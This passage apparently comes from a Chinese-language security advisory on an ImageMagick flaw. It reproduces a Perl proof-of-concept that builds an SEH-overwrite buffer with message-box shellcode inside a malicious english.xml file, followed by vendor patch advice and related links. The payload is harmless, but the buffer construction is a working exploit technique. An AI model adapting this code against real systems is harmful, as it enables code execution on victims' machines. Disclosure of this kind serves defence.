# this is just a POC shellcode that displays a messagebox using the FatalAppExit function
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
"\x31\xc0" . # xor eax, eax
"\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
"\x51" . # push ecx
"\x50" . # push eax
"\xff\xd3"; # call ebx
my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer
# build the malicious xml file
my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale><exception><corrupt><image><warning><message>';
$xml = $xml . $sploit;
$xml = $xml . '</message></warning></image></corrupt></exception></locale>';
my $buffer = $xml;
write_file("english.xml", $buffer);
建议:
--------------------------------------------------------------------------------
厂商补丁:
ImageMagick
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
ImageMagick 的详细介绍:请点这里
ImageMagick 的下载地址:请点这里
相关阅读:
Linux下PHP支持ImageMagick和MagicWandForPHP
Linux下ImageMagick和MagicWand For PHP的安装
Linux下ImageMagick和JMagick的安装整理